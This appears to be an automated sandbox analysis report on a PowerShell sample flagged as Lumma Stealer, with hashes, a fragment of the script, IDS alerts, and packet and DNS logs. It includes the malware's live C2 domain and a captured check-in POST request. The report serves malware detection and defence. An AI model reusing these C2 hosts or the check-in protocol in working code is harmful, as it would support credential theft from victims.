                                                                                                                                                          Entropy (8bit):5.998098102409046
                                                                                                                                                          TrID:
                                                                                                                                                            File name:xaSPJNbl.ps1
                                                                                                                                                            File size:47'033'442 bytes
                                                                                                                                                            MD5:b1c4cb0479a434c478b9e5e38cc42fe0
                                                                                                                                                            SHA1:ad45a2bccacb5ae981358cba37260ca3fe4e1e24
                                                                                                                                                            SHA256:a4063200b38b2a71b1f70d11a73828ebaadd0db2044cc3fcdc29aabb17341224
                                                                                                                                                            SHA512:661439f4c1521b898bc55c2a36b6cbe05033292da1149d603d5b0fe427159b440cd56325a0185f1499f36fd39cd07d068665fb511496f8851761ff34119508ed
                                                                                                                                                            SSDEEP:49152:gfnNe/U6WuKfPXzJkhfCFG3pD8jcO2sq8y7AhzveWkc+VAHwMCJtBuYT6+APN/fg:n
                                                                                                                                                            TLSH:B0A7339079F5F95B037CD12320BEAF1B0EB09EA38E05B16976E5F8DB115A732096384D
                                                                                                                                                            File Content Preview:.. $qNbKJOQg = "Stop".. Set-Location $Env:AppData.. $oLsXWGVm = "$Env:AppData\zcZPHzDH".. if (Test-Path $oLsXWGVm) {.. if (Test-Path "$Env:AppData\NIHekPsI.txt") {.. Remove-Item "$Env:AppData\NIHekPsI.txt".. }..

                                                                                                                                                            File Icon

                                                                                                                                                            Icon Hash:3270d6baae77db44

                                                                                                                                                            Network Behavior

                                                                                                                                                            Suricata IDS Alerts

                                                                                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                            2024-11-19T20:06:24.186580+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849709188.114.97.3443TCP
                                                                                                                                                            2024-11-19T20:06:24.636452+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.849709188.114.97.3443TCP
                                                                                                                                                            2024-11-19T20:06:24.636452+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.849709188.114.97.3443TCP
                                                                                                                                                            2024-11-19T20:06:26.831577+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849710188.114.97.3443TCP
                                                                                                                                                            2024-11-19T20:06:27.534872+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.849710188.114.97.3443TCP
                                                                                                                                                            2024-11-19T20:06:27.534872+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.849710188.114.97.3443TCP
                                                                                                                                                            2024-11-19T20:06:30.348718+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849712188.114.97.3443TCP
                                                                                                                                                            2024-11-19T20:06:31.592852+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849713188.114.97.3443TCP
                                                                                                                                                            2024-11-19T20:06:34.731965+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849714188.114.97.3443TCP
                                                                                                                                                            2024-11-19T20:06:36.510272+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849715188.114.97.3443TCP
                                                                                                                                                            2024-11-19T20:06:36.881578+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.849715188.114.97.3443TCP
                                                                                                                                                            2024-11-19T20:06:37.872566+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849716188.114.97.3443TCP
                                                                                                                                                            2024-11-19T20:06:40.548988+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849717188.114.97.3443TCP
                                                                                                                                                            2024-11-19T20:06:40.963062+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.849717188.114.97.3443TCP
                                                                                                                                                            2024-11-19T20:06:41.473361+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849718172.67.75.40443TCP

                                                                                                                                                            Network Port Distribution

                                                                                                                                                            TCP Packets

                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                            Nov 19, 2024 20:06:23.713613033 CET49709443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:23.713629007 CET44349709188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:23.713757992 CET49709443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:23.719238043 CET49709443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:23.719249964 CET44349709188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:24.186080933 CET44349709188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:24.186579943 CET49709443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:24.196959972 CET49709443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:24.196970940 CET44349709188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:24.197396994 CET44349709188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:24.268140078 CET49709443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:24.268157959 CET49709443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:24.268248081 CET44349709188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:24.636472940 CET44349709188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:24.636614084 CET44349709188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:24.636986017 CET49709443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:24.648686886 CET49709443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:24.648715019 CET44349709188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:26.366374969 CET49710443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:26.366403103 CET44349710188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:26.366493940 CET49710443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:26.366944075 CET49710443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:26.366959095 CET44349710188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:26.831475973 CET44349710188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:26.831577063 CET49710443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:26.844779015 CET49710443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:26.844800949 CET44349710188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:26.845174074 CET44349710188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:26.846566916 CET49710443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:26.846729040 CET49710443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:26.846752882 CET44349710188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:27.534866095 CET44349710188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:27.534918070 CET44349710188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:27.534949064 CET44349710188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:27.534982920 CET44349710188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:27.535001993 CET49710443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:27.535022020 CET44349710188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:27.535037041 CET49710443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:27.535445929 CET44349710188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:27.535486937 CET49710443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:27.535496950 CET44349710188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:27.536051035 CET44349710188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:27.536082983 CET49710443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:27.536092043 CET44349710188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:27.539823055 CET44349710188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:27.539850950 CET44349710188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:27.539870024 CET49710443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:27.539881945 CET44349710188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:27.539892912 CET44349710188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:27.539916039 CET49710443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:27.631741047 CET44349710188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:27.631802082 CET49710443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:27.631825924 CET44349710188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:27.631850958 CET44349710188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:27.631899118 CET49710443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:27.642417908 CET49710443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:27.642432928 CET44349710188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:27.642457008 CET49710443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:27.642462015 CET44349710188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:29.575124025 CET49712443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:29.575184107 CET44349712188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:29.575248957 CET49712443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:29.575812101 CET49712443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:29.575836897 CET44349712188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:30.348639011 CET44349712188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:30.348717928 CET49712443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:30.356525898 CET49712443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:30.356544971 CET44349712188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:30.356956959 CET44349712188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:30.358278036 CET49712443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:30.358390093 CET49712443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:30.358452082 CET44349712188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:30.921207905 CET44349712188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:30.921315908 CET44349712188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:30.921412945 CET49712443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:30.923319101 CET49712443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:30.923346043 CET44349712188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:31.105464935 CET49713443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:31.105506897 CET44349713188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:31.105921030 CET49713443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:31.106519938 CET49713443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:31.106532097 CET44349713188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:31.592628002 CET44349713188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:31.592852116 CET49713443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:31.610743046 CET49713443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:31.610764980 CET44349713188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:31.611080885 CET44349713188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:31.612889051 CET49713443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:31.612889051 CET49713443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:31.612929106 CET44349713188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:31.613250971 CET49713443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:31.659329891 CET44349713188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:33.977305889 CET44349713188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:33.977412939 CET44349713188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:33.977526903 CET49713443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:33.977560043 CET49713443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:33.977571011 CET44349713188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:34.260116100 CET49714443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:34.260174036 CET44349714188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:34.260236979 CET49714443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:34.260611057 CET49714443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:34.260626078 CET44349714188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:34.731894016 CET44349714188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:34.731965065 CET49714443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:34.733375072 CET49714443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:34.733385086 CET44349714188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:34.733707905 CET44349714188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:34.735706091 CET49714443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:34.735862970 CET49714443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:34.735902071 CET44349714188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:34.736056089 CET49714443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:34.736066103 CET44349714188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:35.248878002 CET44349714188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:35.249104023 CET49714443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:35.249129057 CET44349714188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:35.249176025 CET49714443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:36.033591986 CET49715443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:36.033634901 CET44349715188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:36.033698082 CET49715443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:36.033988953 CET49715443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:36.034003973 CET44349715188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:36.510191917 CET44349715188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:36.510272026 CET49715443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:36.512196064 CET49715443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:36.512211084 CET44349715188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:36.512502909 CET44349715188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:36.514146090 CET49715443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:36.514564991 CET49715443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:36.514573097 CET44349715188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:36.881597996 CET44349715188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:36.881685972 CET44349715188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:36.881936073 CET49715443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:36.882298946 CET49715443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:36.882323027 CET44349715188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:37.413809061 CET49716443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:37.413849115 CET44349716188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:37.413917065 CET49716443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:37.414279938 CET49716443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:37.414294004 CET44349716188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:37.872503996 CET44349716188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:37.872565985 CET49716443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:37.874514103 CET49716443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:37.874521017 CET44349716188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:37.874746084 CET44349716188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:37.876420021 CET49716443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:37.876806974 CET49716443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:37.876828909 CET44349716188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:37.877058029 CET49716443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:37.877084017 CET44349716188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:37.877186060 CET49716443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:37.877218008 CET44349716188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:37.877423048 CET49716443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:37.877458096 CET44349716188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:37.877573013 CET49716443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:37.877607107 CET44349716188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:37.877667904 CET49716443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:37.877686024 CET44349716188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:39.974550962 CET44349716188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:39.974803925 CET44349716188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:39.975053072 CET49716443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:39.975263119 CET49716443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:39.975269079 CET44349716188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:40.085146904 CET49717443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:40.085192919 CET44349717188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:40.085279942 CET49717443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:40.085592031 CET49717443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:40.085608006 CET44349717188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:40.548768044 CET44349717188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:40.548988104 CET49717443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:40.553042889 CET49717443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:40.553055048 CET44349717188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:40.553289890 CET44349717188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:40.555039883 CET49717443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:40.555229902 CET49717443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:40.555247068 CET44349717188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:40.963026047 CET44349717188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:40.963129997 CET44349717188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:40.963181973 CET49717443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:40.973906040 CET49717443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:40.973948002 CET44349717188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:40.973963976 CET49717443192.168.2.8188.114.97.3
                                                                                                                                                            Nov 19, 2024 20:06:40.973972082 CET44349717188.114.97.3192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:40.998095036 CET49718443192.168.2.8172.67.75.40
                                                                                                                                                            Nov 19, 2024 20:06:40.998136044 CET44349718172.67.75.40192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:40.998286009 CET49718443192.168.2.8172.67.75.40
                                                                                                                                                            Nov 19, 2024 20:06:40.998645067 CET49718443192.168.2.8172.67.75.40
                                                                                                                                                            Nov 19, 2024 20:06:40.998660088 CET44349718172.67.75.40192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:41.473272085 CET44349718172.67.75.40192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:41.473361015 CET49718443192.168.2.8172.67.75.40
                                                                                                                                                            Nov 19, 2024 20:06:41.475469112 CET49718443192.168.2.8172.67.75.40
                                                                                                                                                            Nov 19, 2024 20:06:41.475485086 CET44349718172.67.75.40192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:41.475810051 CET44349718172.67.75.40192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:41.477446079 CET49718443192.168.2.8172.67.75.40
                                                                                                                                                            Nov 19, 2024 20:06:41.519331932 CET44349718172.67.75.40192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:41.579271078 CET44349718172.67.75.40192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:41.579355001 CET44349718172.67.75.40192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:41.579395056 CET44349718172.67.75.40192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:41.579428911 CET44349718172.67.75.40192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:41.579431057 CET49718443192.168.2.8172.67.75.40
                                                                                                                                                            Nov 19, 2024 20:06:41.579441071 CET44349718172.67.75.40192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:41.579479933 CET44349718172.67.75.40192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:41.579489946 CET49718443192.168.2.8172.67.75.40
                                                                                                                                                            Nov 19, 2024 20:06:41.579495907 CET44349718172.67.75.40192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:41.579533100 CET49718443192.168.2.8172.67.75.40
                                                                                                                                                            Nov 19, 2024 20:06:41.579545021 CET44349718172.67.75.40192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:41.579591036 CET49718443192.168.2.8172.67.75.40
                                                                                                                                                            Nov 19, 2024 20:06:41.579596043 CET44349718172.67.75.40192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:41.579608917 CET44349718172.67.75.40192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:41.579662085 CET49718443192.168.2.8172.67.75.40
                                                                                                                                                            Nov 19, 2024 20:06:41.585450888 CET49718443192.168.2.8172.67.75.40
                                                                                                                                                            Nov 19, 2024 20:06:41.585484028 CET44349718172.67.75.40192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:41.586447001 CET49718443192.168.2.8172.67.75.40
                                                                                                                                                            Nov 19, 2024 20:06:41.586457014 CET44349718172.67.75.40192.168.2.8

                                                                                                                                                            UDP Packets

                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                            Nov 19, 2024 20:06:23.623641968 CET5947453192.168.2.81.1.1.1
                                                                                                                                                            Nov 19, 2024 20:06:23.664984941 CET53594741.1.1.1192.168.2.8
                                                                                                                                                            Nov 19, 2024 20:06:40.986819029 CET6371053192.168.2.81.1.1.1
                                                                                                                                                            Nov 19, 2024 20:06:40.997049093 CET53637101.1.1.1192.168.2.8

                                                                                                                                                            DNS Queries

                                                                                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                            Nov 19, 2024 20:06:23.623641968 CET192.168.2.81.1.1.10x20c1Standard query (0)5ptit5tuded.cyouA (IP address)IN (0x0001)false
                                                                                                                                                            Nov 19, 2024 20:06:40.986819029 CET192.168.2.81.1.1.10xe7d2Standard query (0)rentry.coA (IP address)IN (0x0001)false

                                                                                                                                                            DNS Answers

                                                                                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                            Nov 19, 2024 20:06:23.664984941 CET1.1.1.1192.168.2.80x20c1No error (0)5ptit5tuded.cyou188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                            Nov 19, 2024 20:06:23.664984941 CET1.1.1.1192.168.2.80x20c1No error (0)5ptit5tuded.cyou188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                            Nov 19, 2024 20:06:40.997049093 CET1.1.1.1192.168.2.80xe7d2No error (0)rentry.co172.67.75.40A (IP address)IN (0x0001)false
                                                                                                                                                            Nov 19, 2024 20:06:40.997049093 CET1.1.1.1192.168.2.80xe7d2No error (0)rentry.co104.26.3.16A (IP address)IN (0x0001)false
                                                                                                                                                            Nov 19, 2024 20:06:40.997049093 CET1.1.1.1192.168.2.80xe7d2No error (0)rentry.co104.26.2.16A (IP address)IN (0x0001)false

                                                                                                                                                            HTTP Request Dependency Graph

                                                                                                                                                            • 5ptit5tuded.cyou
                                                                                                                                                            • rentry.co

                                                                                                                                                            HTTPS Proxied Packets

                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                            0192.168.2.849709188.114.97.34436840C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                            2024-11-19 19:06:24 UTC263OUTPOST /api HTTP/1.1
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                            Content-Length: 8
                                                                                                                                                            Host: 5ptit5tuded.cyou
                                                                                                                                                            2024-11-19 19:06:24 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                            Data Ascii: act=life
                                                                                                                                                            2024-11-19 19:06:24 UTC980INHTTP/1.1 200 OK
                                                                                                                                                            Date: Tue, 19 Nov 2024 19:06:24 GMT
                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                            Connection: close
                                                                                                                                                            Set-Cookie: PHPSESSID=g47ql9n6nc8a2ign2h46flfv99; expires=Sat, 15-Mar-2025 12:53:03 GMT; Max-Age=9999999; path=/
                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                            Pragma: no-cache
                                                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BC7zW5chBelkx7f6PRB2UWIzHx8ww4z06XxuNtmjHa%2B7ptGfenreZCUmsTqoEXM4MlTrMuGaRBFwibnjb7GsZ5odKymekWLpDqzYUzIEeDY6WApX0appAxeHYTIXCmVy4b9G"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                            Server: cloudflare
                                                                                                                                                            CF-RAY: 8e527a2dfce642ec-EWR
                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1635&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2839&recv_bytes=907&delivery_rate=1745367&cwnd=193&unsent_bytes=0&cid=625ce66288e47eea&ts=468&x=0"
                                                                                                                                                            2024-11-19 19:06:24 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
